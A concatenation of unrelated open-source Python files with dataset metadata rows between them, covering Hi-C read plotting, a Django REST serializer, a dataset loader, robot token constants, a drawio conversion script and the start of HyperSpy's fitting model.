for bad in sorted(bads, reverse=True):
del(data1[bad])
del(data2[bad])
for i in xrange(len(data1)):
_ = data1[i].pop(bad)
_ = data2[i].pop(bad)
# get the log
data1 = nozero_log(data1, np.log2)
data2 = nozero_log(data2, np.log2)
# get the eigenvectors
ev1, evect1 = eigh(data1)
ev2, evect2 = eigh(data2)
corr = [[0 for _ in xrange(nvect)] for _ in xrange(nvect)]
# sort eigenvectors according to their eigenvalues => first is last!!
sort_perm = ev1.argsort()
ev1.sort()
evect1 = evect1[sort_perm]
sort_perm = ev2.argsort()
ev2.sort()
evect2 = evect2[sort_perm]
# calculate Pearson correlation
for i in xrange(nvect):
for j in xrange(nvect):
corr[i][j] = abs(pearsonr(evect1[:,-i-1],
evect2[:,-j-1])[0])
# plot
axe = plt.axes([0.1, 0.1, 0.6, 0.8])
cbaxes = plt.axes([0.85, 0.1, 0.03, 0.8])
if show or savefig:
im = axe.imshow(corr, interpolation="nearest",origin='lower', **kwargs)
axe.set_xlabel('Eigen Vectors exp. 1')
axe.set_ylabel('Eigen Vectors exp. 2')
axe.set_xticks(range(nvect))
axe.set_yticks(range(nvect))
axe.set_xticklabels(range(1, nvect + 2))
axe.set_yticklabels(range(1, nvect + 2))
axe.xaxis.set_tick_params(length=0, width=0)
axe.yaxis.set_tick_params(length=0, width=0)
cbar = plt.colorbar(im, cax = cbaxes )
cbar.ax.set_ylabel('Pearson correlation', rotation=90*3,
verticalalignment='bottom')
axe2 = axe.twinx()
axe2.set_yticks(range(nvect))
axe2.set_yticklabels(['%.1f' % (e) for e in ev2[-nvect:][::-1]])
axe2.set_ylabel('corresponding Eigen Values exp. 2', rotation=90*3,
verticalalignment='bottom')
axe2.set_ylim((-0.5, nvect - 0.5))
axe2.yaxis.set_tick_params(length=0, width=0)
axe3 = axe.twiny()
axe3.set_xticks(range(nvect))
axe3.set_xticklabels(['%.1f' % (e) for e in ev1[-nvect:][::-1]])
axe3.set_xlabel('corresponding Eigen Values exp. 1')
axe3.set_xlim((-0.5, nvect - 0.5))
axe3.xaxis.set_tick_params(length=0, width=0)
axe.set_ylim((-0.5, nvect - 0.5))
axe.set_xlim((-0.5, nvect - 0.5))
if savefig:
tadbit_savefig(savefig)
if show:
plt.show()
plt.close('all')
if savedata:
out = open(savedata, 'w')
out.write('# ' + '\t'.join(['Eigen Vector %s'% i
for i in xrange(nvect)]) + '\n')
for i in xrange(nvect):
out.write('\t'.join([str(corr[i][j])
for j in xrange(nvect)]) + '\n')
out.close()
if kwargs.get('get_bads', False):
return corr, bads
else:
return corr
def plot_rsite_reads_distribution(reads_file, outprefix, window=20,
maxdist=1000):
de_right={}
de_left={}
print "process reads"
fl=open(reads_file)
while True:
line=fl.next()
if not line.startswith('#'):
break
nreads=0
try:
while True:
nreads += 1
if nreads % 1000000 == 0:
print nreads
try:
_, n1, sb1, sd1, l1, ru1, rd1, n2, sb2, sd2, l2, ru2, rd2\
= line.split()
sb1, sd1, l1, ru1, rd1, sb2, sd2, l2, ru2, rd2 = \
map(int, [sb1, sd1, l1, ru1, rd1, sb2, sd2, l2,
ru2, rd2])
except ValueError:
print line
raise ValueError("line is not the right format!")
if n1 != n2:
line=fl.next()
continue
#read1 ahead of read2
if sb1 > sb2:
sb1, sd1, l1, ru1, rd1, sb2, sd2, l2, ru2, rd2 = \
sb2, sd2, l2, ru2, rd2, sb1, sd1, l1, ru1, rd1
#direction always -> <-
if not (sd1 == 1 and sd2 == 0):
line=fl.next()
continue
#close to the diagonal
if sb2-sb1 > maxdist:
line=fl.next()
continue
#close to RE 1
if abs(sb1-ru1) < abs(sb1-rd1):
rc1=ru1
else:
rc1=rd1
pos=sb1-rc1
if abs(pos)<=window:
if not pos in de_right:
de_right[pos]=0
de_right[pos]+=1
#close to RE 2
if abs(sb2-ru2) < abs(sb2-rd2):
rc2=ru2
else:
rc2=rd2
pos=sb2-rc2
if abs(pos)<=window:
if not pos in de_left:
de_left[pos]=0
de_left[pos]+=1
line=fl.next()
except StopIteration:
pass
print " finished processing {} reads".format(nreads)
#transform to arrays
ind = range(-window,window+1)
de_r = map(lambda x:de_right.get(x,0), ind)
de_l = map(lambda x:de_left.get(x,0), ind)
#write to files
print "write to files"
fl=open(outprefix+'_count.dat','w')
fl.write('#dist\tX~~\t~~X\n')
for i,j,k in zip(ind,de_r, de_l):
fl.write('{}\t{}\t{}\n'.format(i, j, k))
#write plot
rcParams.update({'font.size': 10})
pp = PdfPages(outprefix+'_plot.pdf')
ind = np.array(ind)
width = 1
pr = plt.bar(ind-0.5, de_r, width, color='r')
pl = plt.bar(ind-0.5, de_l, width, bottom=de_r, color='b')
plt.ylabel("Count")
plt.title("Histogram of counts around cut site")
plt.xticks(ind[::2], rotation="vertical")
plt.legend((pl[0], pr[0]), ("~~X", "X~~"))
plt.gca().set_xlim([-window-1,window+1])
pp.savefig()
pp.close()
def moving_average(a, n=3):
ret = np.cumsum(a, dtype=float)
ret[n:] = ret[n:] - ret[:-n]
return ret[n - 1:] / n
def plot_diagonal_distributions(reads_file, outprefix, ma_window=20,
maxdist=800, de_left=[-2,3], de_right=[0,5]):
rbreaks={}
rejoined={}
des={}
print "process reads"
fl=open(reads_file)
while True:
line=fl.next()
if not line.startswith('#'):
break
nreads=0
try:
while True:
nreads += 1
if nreads % 1000000 == 0:
print nreads
try:
_, n1, sb1, sd1, _, ru1, rd1, n2, sb2, sd2, _, ru2, rd2\
= line.split()
sb1, sd1, ru1, rd1, sb2, sd2, ru2, rd2 = \
map(int, [sb1, sd1, ru1, rd1, sb2, sd2, ru2, rd2])
except ValueError:
print line
raise ValueError("line is not the right format!")
if n1 != n2:
line=fl.next()
continue
#read1 ahead of read2
if sb1 > sb2:
sb1, sd1, ru1, rd1, sb2, sd2, ru2, rd2 = \
sb2, sd2, ru2, rd2, sb1, sd1, ru1, rd1
#direction always -> <-
if not (sd1 == 1 and sd2 == 0):
line=fl.next()
continue
mollen = sb2-sb1
if mollen > maxdist:
line=fl.next()
continue
#DE1
if abs(sb1-ru1) < abs(sb1-rd1):
rc1=ru1
else:
rc1=rd1
pos=sb1-rc1
if pos in de_right:
if not mollen in des:
des[mollen]=0
des[mollen]+=1
line=fl.next()
continue
#DE2
if abs(sb2-ru2) < abs(sb2-rd2):
rc2=ru2
else:
rc2=rd2
pos=sb2-rc2
if pos in de_left:
if not mollen in des:
des[mollen]=0
des[mollen]+=1
line=fl.next()
continue
#random: map on same fragment
if rd1 == rd2:
if not mollen in rbreaks:
rbreaks[mollen]=0
rbreaks[mollen]+=1
line=fl.next()
continue
#rejoined ends
if not mollen in rejoined:
rejoined[mollen]=0
rejoined[mollen]+=1
line=fl.next()
except StopIteration:
pass
print " finished processing {} reads".format(nreads)
#transform to arrays
maxlen = max(max(rejoined),max(des),max(rbreaks))
ind = range(1,maxlen+1)
des = map(lambda x:des.get(x,0), ind)
rbreaks = map(lambda x:rbreaks.get(x,0), ind)
rejoined = map(lambda x:rejoined.get(x,0), ind)
#reweight corner for rejoined
rejoined = map(lambda x: x**.5 * rejoined[x-1]/x, ind)
#write to files
print "write to files"
fl=open(outprefix+'_count.dat','w')
fl.write('#dist\trbreaks\tdes\trejoined\n')
for i,j,k,l in zip(ind,rbreaks,des,rejoined):
fl.write('{}\t{}\t{}\t{}\n'.format(i, j, k, l))
#transform data a bit more
ind, des, rbreaks, rejoined = \
map(lambda x: moving_average(np.array(x), ma_window),
[ind, des, rbreaks, rejoined])
des, rbreaks, rejoined = map(lambda x:x/float(x.sum()),
[des, rbreaks, rejoined])
np.insert(ind,0,0)
np.insert(des,0,0)
np.insert(rbreaks,0,0)
np.insert(rejoined,0,0)
#write plot
pp = PdfPages(outprefix+'_plot.pdf')
rcParams.update({'font.size': 10})
pde = plt.fill_between(ind, des, 0, color='r', alpha=0.5)
prb = plt.fill_between(ind, rbreaks, 0, color='b', alpha=0.5)
prj = plt.fill_between(ind, rejoined, 0, color='y', alpha=0.5)
plt.ylabel("Normalized count")
plt.ylabel("Putative DNA molecule length")
plt.title("Histogram of counts close to the diagonal")
#plt.xticks(ind[::10], rotation="vertical")
plt.legend((prb, pde, prj), ("Random breaks", "Dangling ends",
"Rejoined"))
plt.gca().set_xlim([0,maxlen])
pp.savefig()
pp.close()
def plot_strand_bias_by_distance(fnam, nreads=1000000, valid_pairs=True,
half_step=20, half_len=2000,
full_step=500, full_len=50000, savefig=None):
"""
Classify reads into four categories depending on the strand on which each
of its end is mapped, and plots the proportion of each of these categories
in function of the genomic distance between them.
    Only fully mapped reads mapped on two different restriction fragments (still
    on the same chromosome) are considered.
The four categories are:
- Both read-ends mapped on the same strand (forward)
- Both read-ends mapped on the same strand (reverse)
      - Both read-ends mapped on different strands (facing), like extra-dangling-ends
      - Both read-ends mapped on different strands (opposed), like extra-self-circles
    :param fnam: path to tsv file with intersection of mapped ends
    :param True valid_pairs: consider only read-ends mapped
       on different restriction fragments. If False, considers only read-ends
       mapped on the same restriction fragment.
    :param 1000000 nreads: number of reads used to plot (if None, all will be used)
    :param 20 half_step: binning for the first part of the plot
    :param 2000 half_len: maximum distance for the first part of the plot
    :param 500 full_step: binning for the second part of the plot
    :param 50000 full_len: maximum distance for the second part of the plot
    :param None savefig: path to save figure
"""
max_len = 100000
genome_seq = OrderedDict()
pos = 0
fhandler = open(fnam)
for line in fhandler:
if line.startswith('#'):
if line.startswith('# CRM '):
crm, clen = line[6:].split('\t')
genome_seq[crm] = int(clen)
else:
break
pos += len(line)
fhandler.seek(pos)
names = ['<== <== both reverse',
'<== ==> opposed (Extra-self-circles)',
'==> <== facing (Extra-dangling-ends)',
'==> ==> both forward']
dirs = [[0 for i in range(max_len)],
[0 for i in range(max_len)],
[0 for i in range(max_len)],
[0 for i in range(max_len)]]
iterator = (fhandler.next() for _ in xrange(nreads)) if nreads else fhandler
if valid_pairs:
comp_re = lambda x, y: x != y
else:
comp_re = lambda x, y: x == y
for line in iterator:
(crm1, pos1, dir1, len1, re1, _,
crm2, pos2, dir2, len2, re2) = line.strip().split('\t')[1:12]
pos1, pos2 = int(pos1), int(pos2)
if pos2 < pos1:
pos2, pos1 = pos1, pos2
dir2, dir1 = dir1, dir2
len2, len1 = len1, len2
dir1, dir2 = int(dir1), int(dir2)
len1, len2 = int(len1), int(len2)
if dir1 == 0:
pos1 -= len1
if dir2 == 1:
pos2 += len2
diff = pos2 - pos1
        # only ligated; same chromosome; below max_len; not multi-contact
if comp_re(re1, re2) and crm1 == crm2 and diff < max_len and len1 == len2:
dir1, dir2 = dir1 * 2, dir2
dirs[dir1 + dir2][diff] += 1
sum_dirs = [0 for i in range(max_len)]
for i in range(max_len):
sum_dir = float(sum(dirs[d][i] for d in range(4)))
for d in range(4):
try:
dirs[d][i] = dirs[d][i] / sum_dir
except ZeroDivisionError:
dirs[d][i] = 0.
sum_dirs[i] = sum_dir
plt.figure(figsize=(14, 9))
if full_step:
axLp = plt.subplot2grid((3, 2), (0, 0), rowspan=2)
axLb = plt.subplot2grid((3, 2), (2, 0), sharex=axLp)
axRp = plt.subplot2grid((3, 2), (0, 1), rowspan=2, sharey=axLp)
axRb = plt.subplot2grid((3, 2), (2, 1), sharex=axRp, sharey=axLb)
else:
axLp = plt.subplot2grid((3, 1), (0, 0), rowspan=2)
axLb = plt.subplot2grid((3, 1), (2, 0), sharex=axLp)
for d in range(4):
axLp.plot([sum(dirs[d][i:i + half_step]) / half_step
for i in range(0, half_len - half_step, half_step)],
alpha=0.7, label=names[d])
axLp.set_ylim(0, 1)
axLp.set_yticks([0, 0.25, 0.5, 0.75, 1])
axLp.set_xlim(0, half_len / half_step)
axLp.set_xticks(axLp.get_xticks()[:-1])
axLp.set_xticklabels([str(int(i)) for i in axLp.get_xticks() * half_step])
axLp.grid()
if full_step:
axLp.spines['right'].set_visible(False)
plt.setp(axLp.get_xticklabels(), visible=False)
axLb.spines['right'].set_visible(False)
axLp.set_ylabel('Proportion of reads in each category')
axLb.bar(range(0, half_len / half_step - 1),
[sum(sum_dirs[i:i + half_step]) / half_step
for i in range(0, half_len - half_step, half_step)],
alpha=0.5, color='k')
axLb.set_ylabel("Log number of reads\nper genomic position")
axLb.set_yscale('log')
axLb.grid()
axLb.set_xlabel('Distance between mapping position of the two ends\n'
'(averaged in windows of 20 nucleotides)')
if full_step:
for d in range(4):
axRp.plot([sum(dirs[d][i:i + full_step]) / full_step
for i in range(half_len, full_len + full_step, full_step)],
alpha=0.7, label=names[d])
axRp.spines['left'].set_visible(False)
axRp.set_xlim(0, full_len / full_step - 2000 / full_step)
axRp.set_xticks(range((10000 - half_step) / full_step, (full_len + full_step) / full_step, 20))
axRp.set_xticklabels([int(i) for i in range(10000, full_len + full_step, full_step * 20)])
plt.setp(axRp.get_xticklabels(), visible=False)
axRp.legend(title='Strand on which each read-end is mapped\n(first read-end is always smaller than second)')
axRp.yaxis.tick_right()
axRp.tick_params(labelleft=False)
axRp.tick_params(labelright=False)
axRp.grid()
axRb.bar(range(0, full_len / full_step - half_len / full_step + 1),
[sum(sum_dirs[i:i + full_step]) / full_step
for i in range(half_len, full_len + full_step, full_step)],
alpha=0.5, color='k')
axRb.set_ylim(0, max(sum_dirs) * 1.1)
axRb.spines['left'].set_visible(False)
axRb.yaxis.tick_right()
axRb.tick_params(labelleft=False)
axRb.tick_params(labelright=False)
axRb.set_xlabel('Distance between mapping position of the two ends\n'
                        '(averaged in windows of 500 nucleotides)')
axRb.set_yscale('log')
axRb.grid()
# decorate...
d = .015 # how big to make the diagonal lines in axes coordinates
# arguments to pass to plot, just so we don't keep repeating them
kwargs = dict(transform=axLp.transAxes, color='k', clip_on=False)
axLp.plot((1 - d, 1 + d), (1-d, 1+d), **kwargs) # top-left diagonal
axLp.plot((1 - d, 1 + d), (-d, +d), **kwargs) # top-right diagonal
kwargs.update(transform=axRp.transAxes) # switch to the bottom axes
axRp.plot((-d, +d), (1 - d, 1 + d), **kwargs) # bottom-left diagonal
axRp.plot((-d, +d), (-d, +d), **kwargs) # bottom-right diagonal
w = .015
h = .030
# arguments to pass to plot, just so we don't keep repeating them
kwargs = dict(transform=axLb.transAxes, color='k', clip_on=False)
axLb.plot((1 - w, 1 + w), (1 - h, 1 + h), **kwargs) # top-left diagonal
axLb.plot((1 - w, 1 + w), ( - h, + h), **kwargs) # top-right diagonal
kwargs.update(transform=axRb.transAxes) # switch to the bottom axes
axRb.plot((- w, + w), (1 - h, 1 + h), **kwargs) # bottom-left diagonal
axRb.plot((- w, + w), ( - h, + h), **kwargs) # bottom-right diagonal
plt.subplots_adjust(wspace=0.05)
plt.subplots_adjust(hspace=0.1)
else:
axLp.legend(title='Strand on which each read-end is mapped\n(first read-end is always smaller than second)')
if savefig:
tadbit_savefig(savefig)
else:
plt.show()
# For back compatibility
def insert_sizes(fnam, savefig=None, nreads=None, max_size=99.9, axe=None,
show=False, xlog=False, stats=('median', 'perc_max'),
too_large=10000):
"""
Deprecated function, use fragment_size
"""
warn("WARNING: function has been replaced by fragment_size", category=DeprecationWarning,)
return fragment_size(fnam, savefig=savefig, nreads=nreads, max_size=max_size, axe=axe,
show=show, xlog=xlog, stats=stats,
too_large=too_large)
| gpl-3.0 | -8,409,796,578,718,925,000 | 39.094194 | 124 | 0.531199 | false |
opennode/nodeconductor | waldur_core/monitoring/serializers.py | 1 | 1672 | from collections import defaultdict
from rest_framework import serializers
from .models import ResourceItem, ResourceSla
from .utils import get_period, to_list
class ResourceSlaStateTransitionSerializer(serializers.Serializer):
timestamp = serializers.IntegerField()
state = serializers.SerializerMethodField()
def get_state(self, obj):
return obj.state and 'U' or 'D'
class MonitoringSerializerMixin(serializers.Serializer):
sla = serializers.SerializerMethodField()
monitoring_items = serializers.SerializerMethodField()
class Meta:
fields = ('sla', 'monitoring_items')
def get_sla(self, resource):
if not hasattr(self, 'sla_map_cache'):
self.sla_map_cache = {}
request = self.context['request']
items = ResourceSla.objects.filter(scope__in=to_list(self.instance))
items = items.filter(period=get_period(request))
for item in items:
self.sla_map_cache[item.object_id] = dict(
value=item.value,
agreed_value=item.agreed_value,
period=item.period
)
return self.sla_map_cache.get(resource.id)
def get_monitoring_items(self, resource):
if not hasattr(self, 'monitoring_items_map'):
self.monitoring_items_map = {}
items = ResourceItem.objects.filter(scope__in=to_list(self.instance))
self.monitoring_items_map = defaultdict(dict)
for item in items:
self.monitoring_items_map[item.object_id][item.name] = item.value
return self.monitoring_items_map.get(resource.id)
| mit | 9,157,306,062,313,611,000 | 33.122449 | 81 | 0.641746 | false |
google/dl_bounds | dl_bounds/src/data.py | 1 | 5898 | # coding=utf-8
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Dataset retrieval."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import cPickle
import os
from dl_bounds.src.exp_helpers import flip_labels
from dl_bounds.src.exp_helpers import get_split
import numpy as np
from scipy.io import loadmat
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import LabelBinarizer
from sklearn.preprocessing import StandardScaler
import tensorflow as tf
def get_mnist(data_path, val_size=10000):
ds = tf.contrib.learn.datasets.mnist.read_data_sets(
data_path, one_hot=False, validation_size=val_size, seed=1)
return (ds.train.images, ds.train.labels, ds.validation.images,
ds.validation.labels)
def get_cifar10(data_path):
"""Returns cifar10 dataset.
Args:
data_path: dataset location.
Returns:
tuple (training instances, training labels,
testing instances, testing labels)
Instances of dimension # of instances X dimension.
"""
x_train = np.zeros((50000, 3072))
y_train = np.zeros((50000,), dtype=int)
x_val = np.zeros((10000, 3072))
y_val = np.zeros((10000,), dtype=int)
cur = 0
for batch_index in range(1, 6):
with tf.gfile.Open(
os.path.join(data_path,
"cifar-10-batches-py/data_batch_%d" % batch_index),
"rb") as fo:
batch_data = cPickle.load(fo)
m = batch_data["data"].shape[0]
x_train[cur:cur + m, :] = batch_data["data"].astype(np.float32)
y_train[cur:cur + m] = np.array(batch_data["labels"])
cur += m
assert cur == 50000
with tf.gfile.Open(
os.path.join(data_path, "cifar-10-batches-py/test_batch"), "rb") as fo:
batch_data = cPickle.load(fo)
x_val = batch_data["data"].astype(np.float32)
y_val = np.array(batch_data["labels"])
x_train /= 255.0
x_val /= 255.0
return (x_train, y_train, x_val, y_val)
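# Minimal usage sketch for get_cifar10 (assumes the extracted
# "cifar-10-batches-py" directory lives under data_path; the path below is an
# example only):
#   x_train, y_train, x_val, y_val = get_cifar10("/tmp/cifar10")
#   # x_train: (50000, 3072) floats scaled to [0, 1]; y_train: (50000,) int labels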
def get_data(dataset_name, data_path, split_i, split_n, flip_label_ratio=0):
"""Returns a dataset or a given split.
Args:
dataset_name: possible choice: cifar10, mnist, covtype.
data_path: dataset location.
split_i: split index.
split_n: number of examples per split. If -1 -- returns the whole dataset.
flip_label_ratio: randomly flips given amount of labels in the
training and testing sets.
Returns:
tuple (training instances, training labels,
testing instances, testing labels)
Instances of dimension # of instances X dimension.
"""
if dataset_name == "mnist":
(x, y, _, _) = get_mnist(data_path)
    # Subsampling validation set from the training set
    # (concerned that val follows a slightly different distribution)
x_train, x_val, y_train, y_val = train_test_split(
x, y, test_size=0.2, random_state=1)
elif dataset_name == "cifar10":
(x_train, y_train, x_val, y_val) = get_cifar10(data_path)
elif dataset_name == "covtype":
with tf.gfile.Open(os.path.join(data_path, "covtype.mat"), "r") as fh:
mat = loadmat(fh)
x, y = mat["data"].T.todense(), mat["label"].squeeze()
y -= 1
StandardScaler(copy=False, with_mean=True, with_std=True).fit_transform(x)
x_train, x_val, y_train, y_val = train_test_split(
x, y, test_size=0.33, random_state=1)
if split_n > 0: # For negative split_n, return all the data
x_train, y_train = get_split(x_train, y_train, split_i, split_n)
num_classes = len(set(y_train))
if flip_label_ratio > 0:
tf.logging.info("Flipping %f%% of labels in the training set",
flip_label_ratio * 100)
y_train = flip_labels(y_train, flip_label_ratio)
y_val = flip_labels(y_val, flip_label_ratio)
assert (y_train.min() == 0) and (y_val.min() == 0)
lb = LabelBinarizer()
y_train = lb.fit_transform(y_train)
y_val = lb.transform(y_val)
return (x_train, y_train, x_val, y_val, num_classes)
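# Example call for get_data (a sketch; the data path is an assumption): fetch the
# first split of 1000 MNIST training examples with 10% of the labels flipped:
#   x_tr, y_tr, x_te, y_te, k = get_data("mnist", "/tmp/mnist", split_i=0,
#                                        split_n=1000, flip_label_ratio=0.1)
#   # y_tr and y_te come back one-hot encoded; k is the number of classes.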
class LocalDatasetProvider(object):
"""Data provider for an in-memory dataset."""
def __init__(self, x, y, limit_size=-1, shuffle_seed=1):
self.x = x
self.y = y
self.index = None
self.rand = None
self.reset_and_reshuffle(shuffle_seed)
self.limit_size(limit_size)
def get_input_dim(self):
return self.x.shape[1]
def get_output_dim(self):
return self.y.shape[1]
def has_more(self):
return self.cur < self.size
def read_next(self, n):
if self.cur <= self.size:
n_read = min(self.size - self.cur, n)
x_mb = self.x[self.index[self.cur:self.cur + n_read], :]
y_mb = self.y[self.index[self.cur:self.cur + n_read], :]
leave_out_indices = np.where(y_mb[:, 0] == -1)[0]
      if leave_out_indices.size:
x_mb = np.delete(x_mb, leave_out_indices, axis=0)
y_mb = np.delete(y_mb, leave_out_indices, axis=0)
n_read = x_mb.shape[0]
self.cur += n_read
return x_mb, y_mb
else:
raise Exception("End-of-dataset.")
def limit_size(self, new_size):
if new_size != -1:
self.size = new_size
else:
self.size = self.x.shape[0]
def reset(self):
self.cur = 0
def reset_and_reshuffle(self, shuffle_seed):
self.cur = 0
self.index = np.arange(self.x.shape[0])
self.rand = np.random.RandomState(shuffle_seed)
self.rand.shuffle(self.index)
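# Typical minibatch loop over a LocalDatasetProvider (illustrative sketch; x and
# y are assumed to be numpy arrays of instances and one-hot labels):
#   provider = LocalDatasetProvider(x, y, shuffle_seed=1)
#   while provider.has_more():
#       x_mb, y_mb = provider.read_next(128)
#       ...  # consume the minibatch
#   provider.reset_and_reshuffle(shuffle_seed=2)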
| apache-2.0 | 7,444,681,494,655,159,000 | 29.879581 | 80 | 0.648694 | false |
Bdanilko/EdPy | src/lib/token_bits.py | 1 | 2356 | #!/usr/bin/env python2
# * **************************************************************** **
# File: token_bits.py
# Requires: Python 2.7+ (but not Python 3.0+)
# Note: For history, changes and dates for this file, consult git.
# Author: Brian Danilko, Likeable Software ([email protected])
# Copyright 2015-2017 Microbric Pty Ltd.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License (in the doc/licenses directory)
# for more details.
#
# * **************************************************************** */
"""Contains definitions for bits in the token modules. Typically
STATUS bits are masks, and CONTROL bits are bit numbers (to be
used with setbit)
"""
STATUS_LINE_OVER_LINE = 1
STATUS_LINE_CHANGED = 2
CONTROL_LINE_POWER = 1
CONTROL_LED_POWER = 1
STATUS_MOTOR_STRAIN = 1
STATUS_MOTOR_DISTANCE = 2
CONTROL_MOTOR_SPEED_MASK = 0x0f
CONTROL_MOTOR_REMAIN_GOING = 4
CONTROL_MOTOR_CMD_MASK = 0xe0
STATUS_IRX_BILL_RECEIVED = 0x01
STATUS_IRX_MATCHED = 0x02
STATUX_IRX_CHECK_VALID = 0x04
STATUS_IRX_OBS_RIGHT = 0x08
STATUS_IRX_OBS_CENTRE = 0x10
STATUS_IRX_OBS_LEFT = 0x20
STATUS_IRX_OBS_DETECTED = 0x40
CONTROL_IRX_DO_CHECK = 0
STATUS_BEEP_TUNE_DONE = 0x01
STATUS_BEEP_TONE_DONE = 0x02
STATUS_BEEP_CLAP_DETECTED = 0x04
STATUS_BEEP_TS_ERROR = 0x08
CONTROL_BEEP_PLAY_CODED_TUNE = 0
CONTROL_BEEP_PLAY_TONE = 1
CONTROL_BEEP_PLAY_BEEP = 2
CONTROL_BEEP_PLAY_STRING_TUNE = 3
CONTROL_ITX_TRANSMIT_CHAR = 0
CONTROL_ITX_DO_OBSTACLE_DETECT = 1
CONTROL_INDEX_WRITE_16BIT = 1
CONTROL_INDEX_READ_16BIT = 2
CONTROL_INDEX_WRITE_8BIT = 5
CONTROL_INDEX_READ_8BIT = 6
STATUS_DEVICE_BUTTON_1 = 0x08
STATUS_DEVICE_BUTTON_2 = 0x04
STATUS_DEVICE_BUTTON_3 = 0x02
STATUS_DEVICE_BUTTON_4 = 0x01
STATUS_TIMER_ONE_SHOT_EXPIRED = 0x01
STATUS_TIMER_ONE_SHOT_RUNNING = 0x02
CONTROL_TIMER_TRIGGER_ONE_SHOT = 0
CONTROL_TIMER_TRIGGER_PAUSE = 1
CONTROL_TIMER_ENABLE_SLEEP = 2
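# Usage sketch (illustrative only): STATUS_* values are masks, so they are tested
# with a bitwise AND, while CONTROL_* values are bit numbers meant for a setbit
# helper. `status` and `setbit` below are assumptions made for the example:
#   if status & STATUS_MOTOR_DISTANCE:
#       pass  # the motor has covered the requested distance
#   control = setbit(0, CONTROL_MOTOR_REMAIN_GOING)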
| gpl-2.0 | -8,631,692,526,637,044,000 | 30.837838 | 71 | 0.688879 | false |
andy-sweet/fcdiff | doc/drawio.py | 1 | 1945 | #!/usr/bin/python
import os
import subprocess as sp
import shutil as sh
import argparse
parser = argparse.ArgumentParser(
description = 'Copies and converts drawio XML and PDF files from Dropbox'
)
parser.add_argument('-s', '--src_dir',
help = 'The src directory containing the drawio XML and PDF files',
default = '/Users/sweet/Dropbox/Apps/drawio'
)
parser.add_argument('-v', '--verbose',
help = 'Specify this to get verbose output',
action = 'store_true',
default = False
)
args = parser.parse_args()
if not os.path.isdir(args.src_dir):
raise IOError('Source directory ' + args.src_dir + ' is not a directory')
# the top-level destination is the directory containing this file
dst_dir = os.path.dirname(os.path.realpath(__file__))
# edit these to copy/convert files
file_pre = 'fcdiff'
file_dict = {
'methods' : (
'graphical_model',
'graphical_model_rt',
'graphical_model_all',
),
}
for sub_dir, sub_files in file_dict.items():
sub_dst_dir = os.path.join(dst_dir, sub_dir)
for fs in sub_files:
src_stem = os.path.join(args.src_dir, file_pre + '-' + sub_dir + '-' + fs)
dst_stem = os.path.join(sub_dst_dir, fs)
if args.verbose:
print('Copying XMl source to destination')
xml_src = src_stem + '.xml'
xml_dst = dst_stem + '.xml'
if not os.path.isfile(xml_src):
raise IOError('Could not find drawio XML file ' + xml_src)
sh.copy2(xml_src, xml_dst)
if args.verbose:
print('Copying PDF source to destination')
pdf_src = src_stem + '.pdf'
pdf_dst = dst_stem + '.pdf'
if not os.path.isfile(pdf_src):
raise IOError('Could not find drawio PDF file ' + pdf_src)
sh.copy2(pdf_src, pdf_dst)
if args.verbose:
print('Converting PDF to SVG')
svg_dst = dst_stem + '.svg'
sp.check_call(['pdf2svg', pdf_dst, svg_dst])
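# Example invocation (illustrative): copy and convert the drawio exports with
# verbose output, assuming the default Dropbox location:
#   python drawio.py --src_dir ~/Dropbox/Apps/drawio --verbose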
| mit | -1,236,257,339,607,147,800 | 28.469697 | 82 | 0.60874 | false |
sillvan/hyperspy | hyperspy/model.py | 1 | 78500 | # -*- coding: utf-8 -*-
# Copyright 2007-2011 The HyperSpy developers
#
# This file is part of HyperSpy.
#
# HyperSpy is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# HyperSpy is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with HyperSpy. If not, see <http://www.gnu.org/licenses/>.
import copy
import os
import tempfile
import warnings
import numbers
import numpy as np
import scipy.odr as odr
from scipy.optimize import (leastsq,
fmin,
fmin_cg,
fmin_ncg,
fmin_bfgs,
fmin_l_bfgs_b,
fmin_tnc,
fmin_powell)
from traits.trait_errors import TraitError
from hyperspy import messages
import hyperspy.drawing.spectrum
from hyperspy.drawing.utils import on_figure_window_close
from hyperspy.misc import progressbar
from hyperspy._signals.eels import Spectrum
from hyperspy.defaults_parser import preferences
from hyperspy.axes import generate_axis
from hyperspy.exceptions import WrongObjectError
from hyperspy.decorators import interactive_range_selector
from hyperspy.misc.mpfit.mpfit import mpfit
from hyperspy.axes import AxesManager
from hyperspy.drawing.widgets import (DraggableVerticalLine,
DraggableLabel)
from hyperspy.gui.tools import ComponentFit
from hyperspy.component import Component
from hyperspy.signal import Signal
class Model(list):
"""One-dimensional model and data fitting.
A model is constructed as a linear combination of :mod:`components` that
are added to the model using :meth:`append` or :meth:`extend`. There
    are many predefined components available in the :mod:`components`
    module. If needed, new components can easily be created using the code of
existing components as a template.
Once defined, the model can be fitted to the data using :meth:`fit` or
:meth:`multifit`. Once the optimizer reaches the convergence criteria or
    the maximum number of iterations, the new values of the component parameters
are stored in the components.
It is possible to access the components in the model by their name or by
the index in the model. An example is given at the end of this docstring.
Attributes
----------
spectrum : Spectrum instance
It contains the data to fit.
chisq : A Signal of floats
Chi-squared of the signal (or np.nan if not yet fit)
dof : A Signal of integers
Degrees of freedom of the signal (0 if not yet fit)
red_chisq
Methods
-------
append
Append one component to the model.
extend
Append multiple components to the model.
remove
Remove component from model.
as_signal
        Generate a Spectrum instance (possibly multidimensional)
from the model.
store_current_values
Store the value of the parameters at the current position.
fetch_stored_values
